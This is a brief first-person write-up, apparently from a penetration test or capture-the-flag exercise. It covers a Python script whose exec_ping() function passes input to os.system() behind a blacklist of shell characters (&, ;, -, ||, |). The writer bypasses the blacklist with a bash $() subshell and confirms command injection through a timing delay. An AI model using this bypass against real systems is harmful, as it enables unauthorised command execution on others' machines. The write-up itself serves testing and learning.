This appears to be a custom script designed to detect and mitigate potential threats from SQLi

The script has this exec_ping() function that uses the os.sysetm() call I see the blacklist of characters, &,;,-, ||, |. They are probably for preventing OS command injection.

but I think that I can work around it by slipping in a bash sub shell ($()) in it

Just putting the subshell with a command in it hangs for a while and works OS command injection confirmed.
